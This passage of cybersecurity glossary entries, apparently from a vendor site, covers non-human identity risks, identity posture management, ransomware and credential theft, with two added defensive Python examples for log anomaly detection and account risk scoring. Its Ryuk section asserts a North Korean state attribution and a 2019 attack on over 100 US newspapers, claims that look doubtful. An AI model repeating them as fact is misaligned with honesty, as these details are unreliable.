Service accounts, a common type of NHI, are frequently created and forgotten, leading to a large number of accounts with unknown or poorly documented purposes. This lack of visibility hampers the ability to monitor and manage these accounts effectively, increasing the risk of misuse. Organizations cannot implement proper security controls without a comprehensive understanding of all active service accounts.

#### Increased Attack Surface

The presence of NHIs significantly increases the attack surface of an organization. Each NHI represents a potential entry point that can be exploited by malicious actors. This expanded attack surface requires vigilant monitoring and robust security measures to prevent unauthorized access and data breaches. Without proper visibility and control, NHIs can be easily compromised, leading to severe consequences for the organization's security posture.

#### Over-Permissiveness

Over-permissiveness is a common security issue in environments where NHIs are assigned more privileges than necessary. This can result from poor security practices or misconfigurations, and it allows attackers to exploit these excessive privileges to gain broader access within the network. There are several ways that attackers can exploit over-permissiveness. For example, an attacker could gain access to a privileged account and use it to modify system settings, install malware, move laterally, or access sensitive data. Additionally, an attacker could use a privileged account to launch attacks against other systems on the network.

#### Inadequate Lifecycle Management

Without proper lifecycle management, NHIs can remain active long after they are needed, retaining access to critical resources and posing ongoing security risks. Outdated NHIs may not have the same level of security features as newer versions, leaving them more susceptible to cyberattacks or insider threats. Failure to decommission NHIs in accordance with regulatory requirements can also result in compliance violations and potential penalties. Redundant or unnecessary NHIs can also strain IT systems and resources, leading to performance issues and increased operational costs.

### Best Practices for Securing NHIs

Securing non-human identities (NHIs) requires a multifaceted approach that addresses their unique challenges and vulnerabilities. Here are some best practices to ensure robust protection for NHIs:

#### Implementing Robust Access Policies and Tools

Least Privilege Principle: Ensure that NHIs are granted only the permissions necessary to perform their specific tasks. Regularly audit NHIs and adjust access controls to minimize excessive privileges.

Role-Based Access Control (RBAC): Implement RBAC to manage and enforce access policies based on the roles and responsibilities associated with each NHI.

Access Policy Automation: Use automated tools to enforce access policies and ensure compliance. This reduces the risk of human error and ensures that policies are consistently applied across all NHIs.

#### Real-Time Monitoring and Auditing Credentials

Continuous Monitoring: Implement continuous monitoring solutions to track the activities of NHIs in real time. This helps in detecting anomalies and potential security threats promptly.
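The continuous monitoring practice just described, worked through as an added example (not Silverfort's code): a learning window builds a per-account baseline of normal source hosts, targets, logon types and hours, and later events that deviate from it become alerts. The log format, field names, account names and hosts are all constructed for the example.

```python
"""Continuous monitoring for non-human identities (NHIs) over constructed auth logs.

Added example, not Silverfort code. A learning window establishes what is
"normal" for each service account (source hosts, targets, logon types, hours
of activity); later events that deviate from that baseline become alerts.
The log format, field names, account names and hosts are all constructed.
"""
from collections import defaultdict
from dataclasses import dataclass, field
from datetime import datetime

# Constructed sample log: timestamp|account|source_host|target|logon_type|result
SAMPLE_LOG = """\
2024-03-01T02:00:05|svc_backup|BKP01|FILESRV01|service|success
2024-03-01T02:00:07|svc_backup|BKP01|FILESRV02|service|success
2024-03-02T02:00:04|svc_backup|BKP01|FILESRV01|service|success
2024-03-02T02:00:06|svc_backup|BKP01|FILESRV02|service|success
2024-03-01T09:15:00|svc_ci|JENKINS01|GITLAB01|network|success
2024-03-02T09:17:00|svc_ci|JENKINS01|GITLAB01|network|success
2024-03-02T11:40:00|svc_ci|JENKINS01|ARTIFACTORY01|network|success
2024-03-05T14:22:31|svc_backup|WKSTN-117|DC01|interactive|success
2024-03-05T14:25:02|svc_backup|WKSTN-117|FILESRV01|network|success
2024-03-05T09:16:00|svc_ci|JENKINS01|GITLAB01|network|success
2024-03-05T03:10:00|svc_ci|JENKINS01|DC01|network|failure
"""


@dataclass
class Event:
    ts: datetime
    account: str
    source: str
    target: str
    logon_type: str
    result: str


@dataclass
class Baseline:
    """Observed-normal sets for one NHI, learned from its successful events."""
    sources: set = field(default_factory=set)
    targets: set = field(default_factory=set)
    logon_types: set = field(default_factory=set)
    hours: set = field(default_factory=set)


def parse_log(text):
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, account, source, target, logon_type, result = line.split("|")
        events.append(Event(datetime.fromisoformat(ts), account, source, target, logon_type, result))
    return events


def build_baseline(events, learn_until):
    """Learn per-account baselines from successful events before learn_until.

    Two days of data (as here) gives a narrow hour set; a real deployment
    learns over weeks so that normal variation does not trigger alerts.
    """
    baselines = defaultdict(Baseline)
    for e in events:
        if e.ts < learn_until and e.result == "success":
            b = baselines[e.account]
            b.sources.add(e.source)
            b.targets.add(e.target)
            b.logon_types.add(e.logon_type)
            b.hours.add(e.ts.hour)
    return dict(baselines)


def detect_anomalies(events, baselines, learn_until):
    """Flag post-learning events that deviate from the account's baseline."""
    alerts = []
    for e in events:
        if e.ts < learn_until:
            continue
        b = baselines.get(e.account)
        if b is None:
            # No baseline at all: an NHI nobody inventoried, which is itself a finding.
            alerts.append({"ts": e.ts.isoformat(), "account": e.account,
                           "source": e.source, "reasons": ["unknown_nhi"]})
            continue
        reasons = []
        if e.source not in b.sources:
            reasons.append("new_source_host")
        if e.target not in b.targets:
            reasons.append("new_target")
        # A service account that only ever logged on as a service now logging on
        # interactively suggests a person is using its credentials.
        if e.logon_type == "interactive" and "interactive" not in b.logon_types:
            reasons.append("interactive_logon")
        if e.ts.hour not in b.hours:
            reasons.append("off_hours")
        if e.result != "success":
            reasons.append("failed_auth")
        if reasons:
            alerts.append({"ts": e.ts.isoformat(), "account": e.account,
                           "source": e.source, "reasons": reasons})
    return alerts


def analyze(log_text, learn_until_iso):
    """Parse, baseline and detect in one call; returns the alert list."""
    events = parse_log(log_text)
    learn_until = datetime.fromisoformat(learn_until_iso)
    return detect_anomalies(events, build_baseline(events, learn_until), learn_until)


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG, "2024-03-03T00:00:00"):
        print(alert)
```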
Audit Logs: Maintain detailed audit logs of all actions performed by NHIs. Regularly review these logs to identify suspicious activities and investigate potential security incidents.

Alerting Mechanisms: Set up automated alerting systems to notify the security or SOC teams of any unusual or unauthorized activities involving NHIs. This enables quick responses to potential threats.

#### Using Ephemeral Certificates and Zero Trust Principles

Ephemeral Certificates: Utilize short-lived certificates for authentication instead of static credentials. Ephemeral certificates reduce the risk of credential compromise and limit the window of opportunity for attackers.

Zero Trust Architecture: Adopt a Zero Trust approach to security, where no entity is trusted by default, regardless of whether it is inside or outside the network perimeter. Continuously verify the identity and access privileges of NHIs.

Micro-Segmentation: Implement micro-segmentation to isolate NHIs within the network. This limits lateral movement and reduces the impact of a potential breach.

### Conclusion

Non-human identities have become indispensable for automating processes and ensuring operational efficiency. However, the proliferation of NHIs introduces unique security challenges that cannot be overlooked. These entities often possess elevated privileges and operate without direct human oversight, making them attractive targets for cyber attackers. Real-world incidents, such as the Cloudflare breach, highlight the potential consequences of inadequate NHI management. These cases underscore the importance of visibility, governance, and the need for specialized security measures tailored to the unique nature of NHIs. For cybersecurity and IT professionals, the call to action is clear: prioritize the management and protection of NHIs as a critical component of your overall security strategy. By doing so, you can safeguard your organization against unauthorized access, data breaches, and other cyber threats, ensuring a secure and resilient IT environment.

---

- Published: 2024-03-21
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/identity-security-posture-management/

The continuous process of auditing and strengthening IAM environments, such as user access, authentication methods, and entitlements, to remediate vulnerabilities and reduce identity risk.

Identity Security Posture Management (ISPM) is the process of managing and improving an organization's security policies and controls related to digital identities and their access. ISPM helps identify and remediate weaknesses and vulnerabilities associated with identity and access management (IAM).

It is vital for any organization to ensure that all user accounts are secure so that resources can be accessed securely. However, user accounts also present risks if not properly managed. ISPM aims to identify and mitigate these risks through continuous monitoring of access controls. This includes reviewing access policies, access entitlements, authentication methods, and auditing capabilities.

### Why is ISPM important?

ISPM is essential for any organization that relies on user accounts to control access. It helps:

- Reduce the risk of data breaches resulting from compromised users or excessive access privileges.
- Improve compliance with regulations like NIST, NIS2, NY-DFS, and GDPR that require organizations to limit access to personal data.
- Optimize identity and access management to enable secure access while reducing complexity.
- Gain visibility into identity risks that could threaten critical resources.

In order to achieve effective ISPM, organizations need to implement continuous monitoring of their IAM environments. This includes automating identity audits, access reviews, and control assessments to detect potential issues.
Organizations should then remediate any identified risks by updating policies, deprovisioning excessive access, enabling MFA, and applying other security controls to strengthen their security posture.

With increasing threats targeting identities, ISPM has become crucial for cybersecurity and protecting critical resources. By continuously applying stronger access controls to their users, organizations can reduce their attack surface and strengthen their defenses. Overall, ISPM helps enable a proactive approach to identity security.

### The Importance of Managing Identity Security Posture

As organizations adopt cloud services and expand their digital footprints, identity security posture management has become more crucial. If mismanaged, dormant accounts, weak passwords, overly permissive access rights, and orphaned accounts can all become attack vectors for bad actors to exploit.

Misconfigured identity and access management (IAM) policies are a common security threat. Without proper management, accounts can accumulate excessive privileges over time that go unnoticed. It's important to review IAM policies regularly and ensure least privilege access.

Dormant accounts belonging to former employees or contractors pose risks if left enabled. They should be disabled or deleted when no longer needed. Third-party and orphaned accounts that lack ownership are easily overlooked but attractive targets. They should be monitored closely and de-provisioned when possible.

Enforcing strong, unique passwords and multi-factor authentication (MFA) for accounts helps prevent unauthorized access. Regular password audits and rotation policies reduce the chances of old, weak, or reused passwords.

In hybrid environments, identity synchronization between on-prem directories and cloud platforms must be properly set up and monitored. Out-of-sync identities and passwords create security threats.

With comprehensive identity security posture management, organizations can gain visibility into their identity weak spots, automate controls, and proactively reduce potential risks to their digital assets and infrastructure.

### Key Capabilities of Identity Security Posture Management Solutions

#### Identity and Access Management (IAM)

ISPM solutions enable organizations to implement technologies like MFA and single sign-on (SSO) to verify users' identities and control access to systems and data. MFA adds an extra layer of security by requiring multiple methods to log in, such as a password and a one-time code sent to the user's phone. SSO allows users to access multiple applications with a single set of login credentials.

#### Privileged Access Management (PAM)

ISPM solutions facilitate the management and monitoring of privileged accounts, which have elevated access to critical systems and data. Capabilities include vaulting and rotating (or regularly changing) privileged account passwords, closely auditing the activities of privileged users, and enforcing multi-factor authentication for privileged accounts.

#### Identity Governance and Administration (IGA)

ISPM solutions help organizations manage user identities, access rights, and permissions. Key capabilities include automating user provisioning and de-provisioning, streamlining the review and certification of user access, and detecting and remediating excessive user access and entitlements.

#### Identity Analytics and Risk Intelligence (IARI)

ISPM solutions leverage data analytics to gain visibility into user behavior and identify threats. Capabilities include baselining normal user behavior, detecting anomalies that could indicate compromised accounts or insider threats, analyzing access and entitlement risks, and calculating an organization's identity risk posture and maturity.

ISPM solutions provide a robust set of capabilities to help secure an organization's user accounts, manage privileged access, govern user entitlements, and gain intelligence into identity risks. By leveraging these capabilities, organizations can reduce their attack surface, strengthen compliance, and build resilience.

### Implementing an Identity Security Posture Management Program

To implement an effective Identity Security Posture Management (ISPM) program, organizations should take a comprehensive approach focused on continuous monitoring, risk assessments, strong authentication, least privilege access, and addressing SaaS sprawl.

#### Continuous Monitoring

Continuous monitoring of user activities and access in real time is crucial for managing identity security risks. By constantly scanning for anomalies in user behavior and access patterns, organizations can quickly detect potential threats and vulnerabilities. Continuous monitoring solutions analyze user activities across on-premises and cloud environments to identify risky behaviors that could indicate compromised accounts or insider threats.

#### Regular Risk Assessments

Conducting regular risk assessments is key to uncovering weaknesses in an organization's identity and access management program. Risk assessments evaluate roles, entitlements, and access permissions to identify excessive privileges and unused accounts. They help organizations revise access policies to implement least privilege access and tighten security controls.

#### Strong Authentication

Requiring MFA for user logins and privileged access helps prevent unauthorized access. MFA adds an extra layer of security by requiring not only a password but also another method like a security key, biometric, or one-time code sent to the user's mobile device or email. Enforcing MFA, especially for administrative access, helps shield organizations from compromised credential attacks.
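The risk assessment step above, as an added example that is not Silverfort's code: the posture checks this entry lists (dormant accounts, missing MFA on privileged accounts, orphaned accounts, stale passwords, out-of-sync hybrid identities, disabled-but-not-deleted accounts) are applied to a small constructed account inventory and the findings are ranked by risk. Field names, thresholds and the severity scoring are assumptions.

```python
"""Identity security posture assessment over a constructed account inventory.

Added example, not Silverfort code. It applies the posture checks described
above (dormant accounts, missing MFA on privileged accounts, orphaned
accounts with no owner, stale passwords, out-of-sync hybrid identities,
disabled-but-not-deleted accounts) and returns findings ranked by risk.
Field names, thresholds and the severity scoring are assumptions.
"""
from dataclasses import dataclass
from datetime import date
from typing import Optional, Tuple

AS_OF = date(2024, 3, 20)          # constructed reference date for the assessment
DORMANT_DAYS = 90                  # no login for this long counts as dormant
PASSWORD_MAX_AGE_DAYS = 180
ADMIN_ROLES = {"Domain Admins", "Global Administrator"}
SEVERITY_SCORE = {"high": 10, "medium": 5, "low": 2}


@dataclass
class Account:
    name: str
    enabled: bool
    last_login: Optional[date]        # None: never logged in
    mfa_enabled: bool
    roles: Tuple[str, ...]
    owner: Optional[str]              # None: orphaned, no accountable owner
    password_changed: date
    synced_hash_matches: Optional[bool] = None  # None: not a hybrid-synced identity


# Constructed inventory; names and dates are made up.
INVENTORY = [
    Account("alice", True, date(2024, 3, 19), True, ("Sales",), "alice", date(2024, 1, 5), True),
    Account("bob.contractor", True, date(2023, 11, 2), False, ("Sales",), None, date(2023, 6, 1)),
    Account("helpdesk-admin", True, date(2024, 3, 18), False, ("Domain Admins", "Helpdesk"),
            "it-ops", date(2022, 12, 1), True),
    Account("legacy-app", True, None, False, ("Domain Admins",), None, date(2021, 3, 3)),
    Account("carol", True, date(2024, 3, 15), True, ("Finance",), "carol", date(2024, 2, 1), False),
    Account("old.employee", False, date(2023, 1, 10), False, ("Finance",), None, date(2022, 11, 1)),
]


def assess(acct, as_of=AS_OF):
    """Return a list of (finding, severity) pairs for one account."""
    if not acct.enabled:
        # Disabled is the right state for a leaver, but the account still exists.
        return [("disabled_not_deleted", "low")]
    findings = []
    is_admin = any(r in ADMIN_ROLES for r in acct.roles)
    dormant = acct.last_login is None or (as_of - acct.last_login).days > DORMANT_DAYS
    if dormant:
        findings.append(("dormant_account", "high" if is_admin else "medium"))
    if not acct.mfa_enabled:
        findings.append(("admin_without_mfa", "high") if is_admin else ("no_mfa", "medium"))
    if acct.owner is None:
        findings.append(("orphaned_account", "high" if is_admin else "medium"))
    if (as_of - acct.password_changed).days > PASSWORD_MAX_AGE_DAYS:
        findings.append(("stale_password", "medium"))
    if acct.synced_hash_matches is False:
        findings.append(("hybrid_sync_mismatch", "medium"))
    return findings


def posture_report(inventory, as_of=AS_OF):
    """Assess every account and rank those with findings by summed severity."""
    report = {}
    for acct in inventory:
        findings = assess(acct, as_of)
        if findings:
            report[acct.name] = {
                "findings": findings,
                "risk": sum(SEVERITY_SCORE[sev] for _, sev in findings),
            }
    return dict(sorted(report.items(), key=lambda item: -item[1]["risk"]))


if __name__ == "__main__":
    for name, entry in posture_report(INVENTORY).items():
        print(f"{name:16} risk={entry['risk']:3}  {entry['findings']}")
```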
#### Least Privilege Access

Implementing least privilege access control policies ensures that users only have the minimum level of access necessary to perform their jobs. Strict access management, including frequent access reviews and the timely de-provisioning of unused accounts, reduces the attack surface and limits the damage from compromised accounts or insider threats.

#### Addressing SaaS Sprawl

With the rapid adoption of Software-as-a-Service (SaaS) apps, organizations struggle to gain visibility and control over user access and activities across a growing number of cloud services. Solutions that provide a single pane of glass to manage access and entitlements across SaaS environments help address the security risks introduced by SaaS sprawl. They enable a consistent approach to access governance, risk management, and compliance across the organization.

---

- Published: 2024-01-14
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/ransomware/

Malicious software that encrypts an organization's data or systems and demands a ransom to release the decryption key, often coupled with extortion tactics.

Ransomware is a type of malicious software, or malware, that encrypts files on a device, rendering them inaccessible. The attacker then demands a ransom payment in exchange for decrypting the files.

Ransomware has been around since 1989 but has become more prevalent and sophisticated in recent years. The earliest forms of ransomware were relatively simple, locking access to the computer system. Modern ransomware variants encrypt specific files on the system's hard drive using asymmetric encryption algorithms that generate a pair of keys: a public key to encrypt the files and a private key to decrypt them. The only way to decrypt and access the files again is with the private key held by the attacker.

Ransomware is often delivered through phishing emails containing malicious attachments or links. Once executed on the victim's system, it encrypts files and displays a ransom note with instructions for how to pay to recover access. The ransom is usually demanded in a cryptocurrency like Bitcoin to avoid being traced.

There are two primary types of ransomware:

- Locker ransomware locks users out of their computers or files. It locks the entire system and prevents any access.
- Crypto-ransomware encrypts files on the system, making them inaccessible. It targets specific file extensions like documents, images, videos, and more.

Ransomware has become a lucrative criminal business model. New variants are continuously developed and released to maximize the amount of money extorted from victims. Prevention through cybersecurity best practices, like backing up data and employee education, is the best defense against ransomware.

### How Ransomware Works

Ransomware is a form of malware that encrypts files or locks access to a device, then demands payment of a ransom to restore access. Ransomware infections typically happen in one of three ways:

#### Trojan Downloads

Disguised as legitimate software, Trojans are downloaded by unsuspecting users and install ransomware on the system. These are often distributed through malicious code embedded within email attachments, software cracks, or pirated media.

#### Phishing Emails

Phishing emails contain malicious links or attachments that install ransomware when clicked or opened. The emails are designed to appear as though they're from a legitimate company to trick the recipient into downloading the payload.

#### Exploiting Vulnerabilities

Some ransomware takes advantage of vulnerabilities in network systems or software to spread to connected devices. Once a device is infected, the ransomware encrypts files on that system and any network shares it has access to.

Ransomware payloads typically display messages on the screen demanding payment of a ransom, usually in cryptocurrency like Bitcoin, to regain access to the files or system. The ransom amount varies but is often several hundred to several thousand dollars. Paying the ransom, however, does not guarantee that access will be restored.

Ransomware has become a lucrative business for cybercriminals. Through the use of malware kits and affiliate programs, even those without advanced technical skills can easily deploy ransomware campaigns. As long as ransomware proves profitable, it is likely to continue posing a threat to both individuals and organizations. Maintaining reliable backups, keeping software up to date, and educating users about cyber threats are some of the best defenses against ransomware.

### The Different Types of Ransomware

There are three main types of ransomware that cyber security professionals should be aware of: scareware, screen lockers, and encrypting ransomware.

#### Scareware

Scareware, also known as deception ransomware, tricks victims into believing their systems have been locked or compromised in order to extort money. Messages claiming that illegal content was detected or system files were encrypted are displayed to frighten the user into paying a "fine." In reality, no such action has actually occurred. Scareware is usually easy to remove using antivirus software.

#### Screen Lockers

Screen lockers, or lock screen ransomware, lock users out of their devices by displaying full-screen messages over the login screen. They prevent access to the system by locking the screen, but do not actually encrypt any files. Some well-known examples are Reveton and FbiLocker. While frustrating, screen lockers typically do not do any permanent damage and can often be removed using a malware removal tool.

#### Encrypting Ransomware

Encrypting ransomware is the most serious type. It encrypts files on infected systems using encryption algorithms that are difficult to break without the decryption key. The ransomware demands payment, often in cryptocurrency, in exchange for the decryption key.
If the ransom is not paid, the files remain encrypted and inaccessible. Some infamous examples of encrypting ransomware are WannaCry, Petya, and Ryuk. Encrypting ransomware requires prevention and backup strategies, as data recovery is very difficult without paying the ransom.

#### Mobile Ransomware

Mobile ransomware is a type of malware that can infect your phone and lock you out of your mobile device. Once infected, the malware will encrypt all of your data and ask for a ransom in order to restore it. If you don't pay the ransom, the malware can even delete your data.

To defend against ransomware, organizations should focus on employee education, strong security controls, antivirus software, keeping systems up to date, and maintaining secure data backups. Paying ransoms only encourages further criminal activity and does not guarantee that files will be recovered, and so should be avoided. With vigilance and proactive defensive measures, the impact of ransomware can be minimized.

### Recent Major Ransomware Attacks

Ransomware attacks have become increasingly common and damaging in recent years. Several major incidents highlight how vulnerable organizations have become to these threats.

#### WannaCry

In May 2017, the WannaCry ransomware attack infected over 200,000 computers across 150 countries. It targeted vulnerabilities in Microsoft Windows operating systems, encrypting files and demanding ransom payments in Bitcoin. The UK's National Health Service was hit hard, forcing some hospitals to turn away non-emergency patients. Total damages exceeded $4 billion.

#### NotPetya

Shortly after WannaCry, NotPetya emerged. Disguised as ransomware, NotPetya was actually a wiper virus designed to destroy data. It brought down Ukrainian infrastructure like power companies, airports, and banks. NotPetya spread globally, infecting companies like FedEx, Maersk, and Merck. NotPetya caused over $10 billion in damages, making it the costliest cyberattack in history at the time.

#### Ryuk

In 2019, Ryuk ransomware targeted over 100 US newspapers. The attack encrypted files, disrupted printing operations, and demanded a $3 million ransom. Several newspapers had to publish smaller editions or switch to online-only for days. Ryuk has since hit other sectors like healthcare, logistics, and finance. Experts tie Ryuk to a sophisticated North Korean state-sponsored group.

Ransomware has rapidly become a national security threat and economic menace. Healthcare, government, media, shipping, and financial services seem to be favored targets, though any organization is at risk. Ransom demands are often six or seven figures, and even if paid, there is no guarantee of data recovery. The only way for companies and governments to defend against ransomware is through vigilance, preparation, and cooperation. Educating employees, maintaining offline backups, keeping software up to date, and enacting an incident response plan can help reduce vulnerability. But as long as there are profits to be made from ransomware, it will likely remain an ongoing battle.

### How to Prevent Ransomware Infections

To prevent ransomware infections, organizations should implement a multi-layered approach focused on employee education, robust security controls, and reliable backups.

#### Employee Education

Employees are often the targets of ransomware attacks through phishing emails containing malicious links or attachments. Educating staff about these threats, and providing training on spotting potential attacks, is critical. Employees should be wary of unsolicited requests for sensitive information or links and taught not to open attachments from unknown or untrusted senders. Regular reminders and simulated phishing campaigns can help reinforce lessons and identify areas needing improvement.

#### Network Segmentation and Endpoint Protection

Network segmentation separates parts of the network into smaller networks to better control access and contain infections.
If ransomware enters one segment, segmentation prevents it from spreading to the entire network. Robust endpoint protection, including antivirus software, intrusion prevention systems, and regular patching, helps block ransomware and other malware. Two-factor authentication for remote access and admin accounts provides an extra layer of security.

#### Backups

Frequent and redundant data backups are key to recovering from a ransomware attack without paying the ransom. Backups should be stored offline and offsite in case the network is compromised. Test restoring backups regularly to ensure the process works and data is intact. If ransomware encrypts files, having accessible backups prevents permanent data loss and eliminates the need to pay the ransom.

#### Additional Controls

Other useful controls include restricting user permissions and privileges, monitoring for signs of compromise like unusual network activity, and planning an incident response strategy in the event of infection. Staying up-to-date with the latest ransomware threats and attack methods, and sharing that knowledge across the organization, helps IT teams implement appropriate defenses.

With strong controls and a focus on education and preparation, organizations can avoid becoming victims of ransomware attacks. But even with the best practices in place, ransomware is an ever-present threat. Regular testing of controls and responses helps minimize damage if an attack succeeds. When implemented together, these layers of defense provide the best protection against ransomware.

### Ransomware Incident Response

Ransomware attacks require a quick and strategic response to minimize damage and ensure recovery.

#### Immediate Response

Upon discovering a ransomware infection, the first step is to isolate the infected systems to prevent the malware from spreading further. Next, determine the scope and severity of the attack to identify which systems and data have been impacted. Secure backup data and disconnect storage devices to protect them from encryption.

With systems isolated, professionals can work to contain and remove the ransomware. Antivirus software and malware removal tools should be used to scan systems and delete malicious files. A full system restore from backup may be required for badly infected machines. During this process, monitor systems for reinfection.

Ransomware variants are constantly evolving to evade detection, so customized tools and techniques may be needed to fully eliminate an advanced strain. In some cases, a ransomware's encryption may be irreversible without paying the ransom. However, paying ransoms funds criminal activity and does not guarantee data retrieval, and so should only be considered as an absolute last resort.

#### Long-term Recovery

Following a ransomware attack, a comprehensive review of security policies and procedures is needed to strengthen defenses and prevent reinfection. Additional staff training on cyber risks and response may also be required.

To restore encrypted data, organizations can use backup files to overwrite infected systems and recover information. Regular, offline data backups are key to minimizing data loss from ransomware. Multiple versions of backups over time allow restoration to a point before initial infection.

Some data may remain unrecoverable if backup files were also encrypted. In these situations, organizations must determine if lost information can be recreated or obtained from other sources. They may need to accept permanent data loss and plan to rebuild certain systems entirely.

Ransomware attacks can be devastating, but with quick thinking and the right strategies, organizations can overcome them. Staying vigilant and preparing for various scenarios will ensure the most effective response when disaster strikes. Continuous evaluation and improvement of cyber defenses can help reduce risks over the long run.
### Ransomware Statistics and Trends

Ransomware attacks have been on the rise in recent years. According to Cybersecurity Ventures, global ransomware damage costs are predicted to reach $20 billion in 2021, up from $11.5 billion in 2019. Symantec's Internet Security Threat Report found a 105% increase in ransomware variants from 2018 to 2019.

The most common types of ransomware today are lock screen ransomware, encryption ransomware, and double extortion ransomware. Lock screen ransomware locks users out of their devices. Encryption ransomware encrypts files and demands payment for the decryption key. Double extortion ransomware encrypts files, demands payment, and also threatens to release sensitive stolen data if payment is not made.

Ransomware attacks frequently target healthcare organizations, government agencies, and educational institutions. These organizations often have sensitive data and may be more willing to pay ransoms to avoid disruption and data breaches. However, paying ransoms emboldens cybercriminals to continue and expand ransomware operations.

Most ransomware is delivered through phishing...

---

- Published: 2024-01-14
- Modified: 2025-08-21
- URL: https://www.silverfort.com/glossary/credential-theft/

The act of stealing login credentials through methods like phishing, malware, brute-force attacks, or data breaches, allowing unauthorized access and potential lateral movement.

Credential theft refers to stealing someone's login credentials, such as usernames and passwords. Cybercriminals use the compromised credentials to gain access to valuable data and accounts, enabling identity theft and financial fraud. Once cybercriminals have access to compromised credentials, they can log into accounts and try to move laterally across an organization's environment. For organizations, credential theft can lead to compromised business accounts, stolen intellectual property, and damaged reputations.

There are a few common ways for thieves to steal credentials:

- Phishing emails and malicious websites: Malicious actors trick victims into entering their credentials on spoofed login pages or by installing malware.
- Keylogging software: Malware tracks the keys victims press and captures their usernames and passwords.
- Brute force attacks: Software automates guessing passwords to access accounts.
- Database breaches: When companies' databases are hacked, thieves access and steal customers' credentials.
- Wi-Fi snooping: Thieves access public Wi-Fi networks to view the credentials victims enter on websites and apps.

To reduce the threat of credential theft, individuals should enable multi-factor authentication on accounts when available, use unique complex passwords, and be cautious of phishing attempts. Organizations should enforce strong password policies, limit access to sensitive data, monitor for database breaches, and provide regular employee cybersecurity training.

### Methods Cybercriminals Use for Credential Theft

Credential theft refers to the act of stealing and compromising a user's login credentials, like usernames and passwords, to gain unauthorized access to sensitive data and accounts. Malicious actors use various methods to steal credentials, including:

#### Phishing and Spear-Phishing

Phishing attacks involve sending fraudulent emails posing as a legitimate company to trick victims into entering their login credentials on a fake website. Spear-phishing targets specific individuals or groups with personalized messages that appear to come from the person's friends or colleagues. These techniques are commonly used to steal credentials.

#### Keylogging and Malware

Keylogging software and malware discreetly monitor and record the keys pressed on a keyboard, capturing login credentials and other sensitive data. Cybercriminals then access the captured information to gain access to accounts and networks.
Social Engineering Social engineering attacks rely on manipulating people into divulging confidential information like passwords. Cyber attackers may call, email or text posing as tech support or a colleague to trick victims into sharing credentials under false pretenses. Brute Force Attacks Brute force attacks work by entering numerous password combinations in an attempt to guess the correct login credentials. While time-consuming, with powerful computers and algorithms, criminals can crack weak passwords. Using strong, unique passwords helps prevent these attacks. Database Theft Some criminals hack into databases containing usernames, passwords and other private records. The stolen database is then used to access associated accounts and profiles. Data breaches have exposed billions of credentials, so password reuse poses serious risks. Types of Credentials Targeted Credential theft refers to the stealing of login credentials like usernames, passwords, and account numbers. These sensitive data points allow access to online accounts and systems. Cybercriminals who obtain stolen credentials can compromise accounts to steal money and personal information or install malware. Passwords Passwords are a common target of credential theft. Hacking techniques like phishing, keylogging, and brute force attacks are used to obtain passwords. Once passwords are stolen, criminals try them on other accounts belonging to the victim like email, banking, and social media. Password reuse and weak, easy-to-guess passwords make this type of credential theft more likely to succeed. Account Numbers Bank accounts, credit cards, and insurance policy numbers are also valuable targets. These numbers provide direct access to funds and accounts. Account numbers are often obtained through database breaches, skimming devices at ATMs and gas stations, or by stealing financial statements and documents from the physical or digital mailbox. 
### Security Questions

The answers to account security questions like “What is your mother’s maiden name?” or “What was your first pet’s name?” are credentials that are frequently targeted. These questions are meant to verify someone’s identity over the phone or online, so the answers can be used to break into accounts. Criminals obtain the answers through phishing, social engineering, and scouring people’s social media profiles.

### Biometric Data

Biometric credentials such as fingerprints, facial recognition data, and retina scans are becoming more commonly used to authenticate identity and access accounts. However, biometric credentials can also be stolen and used by criminals to impersonate victims. Photos and fingerprint images have been leaked in data breaches, and researchers have demonstrated how facial recognition systems can be fooled using photos and 3D printed masks. Although biometric authentication is convenient, no credential is foolproof if stolen.

## Impacts of Credential Theft

Credential theft has serious consequences for both individuals and organizations. Once cybercriminals have stolen login credentials, they gain unauthorized access that can be used for various malicious purposes.

### Data Breaches

With stolen credentials, attackers can access sensitive data stored on networks and systems. They may be able to view or steal trade secrets, customer information, employee records, and other confidential data. These types of breaches can damage a company's reputation, violate privacy laws, and undermine customer trust.

### Lateral Movement

Access to one set of compromised credentials gives hackers a foothold to move laterally within the network in search of additional access and control. They can use credential theft to hop from user to user or system to system, eventually gaining admin-level access. From there, they have control over the entire network's resources.
### Ransomware Attacks

Hackers frequently deploy ransomware attacks after first gaining network access through stolen credentials (using credential stuffing, for example). Once they have admin access, they can encrypt files and systems across the network and demand a ransom payment to decrypt them. These attacks can cripple operations for days or weeks and result in significant financial losses.

### Account Takeover

With someone's username and password in hand, cybercriminals can access online accounts and impersonate the legitimate account owner. They may conduct fraudulent transactions, steal money or data, send malicious messages, or damage the reputation of the account owner. Account takeover has become a major problem, impacting both consumers and businesses.

## Best Practices to Prevent Credential Theft

To effectively prevent credential theft, organizations should implement several best practices.

### Privileged Access Management

Managing and monitoring privileged accounts, especially those with administrative access, is crucial. These accounts should be limited to specific users and closely audited. Multi-factor authentication should be required for all privileged accounts to verify the identity of anyone accessing them.

### Application Whitelisting

Limiting corporate credentials to only approved applications and services reduces the risk of theft. Whitelisting specifies which programs are authorized to run on a network, blocking all others. This prevents malicious software from accessing credentials.

### Regular Updates and Patch Management

Keeping all systems and software up to date with the latest patches ensures that any vulnerabilities that could be exploited to steal credentials are addressed. Updates should be installed promptly across operating systems, applications, network devices and any other technologies.

### User Access Reviews

Conducting frequent reviews of user access rights and privileges verifies that only authorized individuals have access to systems and accounts.
Any accounts that are no longer needed should be deactivated. This limits the potential attack surface for credential theft.

### Security Awareness Training

Educating end users about the risks of credential theft and the best practices they can follow is one of the most effective defenses. Phishing simulations and refresher training should be conducted regularly. Users should be taught never to share account credentials or click suspicious links.

### Password Rotation

Changing account passwords, keys and other credentials on a routine basis minimizes the window of opportunity for theft. The more frequently credentials are rotated, the less useful any stolen credentials become. However, rotation policies should balance security and usability.

## Detecting Credential Theft

To detect credential theft, organizations should monitor for signs of unauthorized access or account misuse. Some indicators of compromised credentials include:

- Login attempts from unknown devices or locations. If a user suddenly logs in from an unfamiliar IP address or device, their account may have been compromised.
- Multiple failed login attempts. Repeated failed login attempts could indicate that an attacker is trying to guess or brute force a user's password.
- New unauthorized access roles or permissions. If a user account is given elevated access rights that the legitimate owner did not request, this could signal an account takeover.
- Strange account activity times. Account access during unusual hours, especially late at night or early morning, could indicate that an attacker is using the stolen credentials.
